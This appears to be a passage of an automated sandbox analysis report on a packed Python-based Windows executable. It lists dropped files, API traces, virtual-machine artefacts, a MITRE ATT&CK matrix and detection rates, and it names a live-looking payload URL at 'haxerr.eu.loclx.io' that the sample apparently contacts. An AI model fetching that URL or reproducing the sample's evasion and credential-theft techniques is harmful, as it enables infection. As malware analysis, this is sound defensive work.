OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: aLsxeH29P2.exe, 00000000.00000003.1714677193.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: aLsxeH29P2.exe, 00000000.00000003.1714279446.0000021C0757F000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: aLsxeH29P2.exe, 00000000.00000003.1714112999.0000021C0757E000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: libcrypto-3.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: aLsxeH29P2.exe, 00000000.00000003.1714112999.0000021C0757E000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: libcrypto-3.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: aLsxeH29P2.exe, 00000000.00000003.1714799794.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.0.dr
Source: aLsxeH29P2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: aLsxeH29P2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: aLsxeH29P2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: aLsxeH29P2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: aLsxeH29P2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
Source: libcrypto-3.dll.0.drStatic PE information: section name: .00cfg
Source: python312.dll.0.drStatic PE information: section name: PyRuntim
Source: C:\Users\user\Desktop\aLsxeH29P2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73522\_lzma.pydJump to dropped file
Source: C:\Users\user\Desktop\aLsxeH29P2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73522\_bz2.pydJump to dropped file
Source: C:\Users\user\Desktop\aLsxeH29P2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73522\python312.dllJump to dropped file
Source: C:\Users\user\Desktop\aLsxeH29P2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73522\select.pydJump to dropped file
Source: C:\Users\user\Desktop\aLsxeH29P2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73522\libcrypto-3.dllJump to dropped file
Source: C:\Users\user\Desktop\aLsxeH29P2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73522\_hashlib.pydJump to dropped file
Source: C:\Users\user\Desktop\aLsxeH29P2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73522\_socket.pydJump to dropped file
Source: C:\Users\user\Desktop\aLsxeH29P2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73522\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\Desktop\aLsxeH29P2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73522\unicodedata.pydJump to dropped file
Source: C:\Users\user\Desktop\aLsxeH29P2.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73522\_decimal.pydJump to dropped file
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DD5830 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF7F3DD5830
Source: C:\Users\user\Desktop\aLsxeH29P2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73522\_lzma.pydJump to dropped file
Source: C:\Users\user\Desktop\aLsxeH29P2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73522\_bz2.pydJump to dropped file
Source: C:\Users\user\Desktop\aLsxeH29P2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73522\python312.dllJump to dropped file
Source: C:\Users\user\Desktop\aLsxeH29P2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73522\select.pydJump to dropped file
Source: C:\Users\user\Desktop\aLsxeH29P2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73522\libcrypto-3.dllJump to dropped file
Source: C:\Users\user\Desktop\aLsxeH29P2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73522\_hashlib.pydJump to dropped file
Source: C:\Users\user\Desktop\aLsxeH29P2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73522\_socket.pydJump to dropped file
Source: C:\Users\user\Desktop\aLsxeH29P2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73522\_decimal.pydJump to dropped file
Source: C:\Users\user\Desktop\aLsxeH29P2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73522\unicodedata.pydJump to dropped file
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17226
Source: C:\Users\user\Desktop\aLsxeH29P2.exeAPI coverage: 6.0 %
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DD9280 FindFirstFileExW,FindClose,0_2_00007FF7F3DD9280
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DD83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF7F3DD83C0
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DF1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7F3DF1874
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DD9280 FindFirstFileExW,FindClose,1_2_00007FF7F3DD9280
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DD83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF7F3DD83C0
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DF1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF7F3DF1874
Source: Amcache.hve.1.drBinary or memory string: VMware
Source: Amcache.hve.1.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.1.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.1.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.1.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.1.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.1.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.1.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.1.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.1.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: curl.exe, 00000002.00000003.1744515341.000001AFC6355000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}
Source: Amcache.hve.1.drBinary or memory string: vmci.sys
Source: Amcache.hve.1.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.1.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.1.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.drBinary or memory string: VMware20,1
Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.1.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.1.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.1.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.1.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.1.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.1.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.1.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DDD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7F3DDD12C
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DF3480 GetProcessHeap,0_2_00007FF7F3DF3480
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DDD30C SetUnhandledExceptionFilter,0_2_00007FF7F3DDD30C
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DDD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7F3DDD12C
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DDC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7F3DDC8A0
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DEA614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7F3DEA614
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DDD30C SetUnhandledExceptionFilter,1_2_00007FF7F3DDD30C
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DDD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF7F3DDD12C
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DDC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF7F3DDC8A0
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FF7F3DEA614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF7F3DEA614
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 1_2_00007FFE126D0AA8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE126D0AA8
Source: C:\Users\user\Desktop\aLsxeH29P2.exeProcess created: C:\Users\user\Desktop\aLsxeH29P2.exe "C:\Users\user\Desktop\aLsxeH29P2.exe"Jump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DF9570 cpuid 0_2_00007FF7F3DF9570
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\Desktop\aLsxeH29P2.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\Desktop\aLsxeH29P2.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\Desktop\aLsxeH29P2.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\Desktop\aLsxeH29P2.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\Desktop\aLsxeH29P2.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\Desktop\aLsxeH29P2.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\Desktop\aLsxeH29P2.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\Desktop\aLsxeH29P2.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\Desktop\aLsxeH29P2.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\Desktop\aLsxeH29P2.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\Desktop\aLsxeH29P2.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\Desktop\aLsxeH29P2.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73522\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeQueries volume information: C:\Users\user\Desktop\aLsxeH29P2.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DDD010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7F3DDD010
Source: C:\Users\user\Desktop\aLsxeH29P2.exeCode function: 0_2_00007FF7F3DF5C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF7F3DF5C00
Source: Amcache.hve.1.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.1.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.1.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.1.drBinary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API		1
DLL Side-Loading		11
Process Injection		11
Process Injection		OS Credential Dumping2
System Time Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		LSASS Memory31
Security Software Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information		Security Account Manager1
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS22
System Information Discovery		Distributed Component Object ModelInput Capture3
Application Layer Protocol		Traffic DuplicationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
aLsxeH29P2.exe50%VirustotalBrowse
aLsxeH29P2.exe37%ReversingLabs

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\_MEI73522\VCRUNTIME140.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73522\_bz2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73522\_decimal.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73522\_hashlib.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73522\_lzma.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73522\_socket.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73522\libcrypto-3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73522\python312.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73522\select.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73522\unicodedata.pyd0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
eu.loclx.io1%VirustotalBrowse
haxerr.eu.loclx.io1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://haxerr.eu.loclx.io/h4xt00l.exe?100%Avira URL Cloudphishing
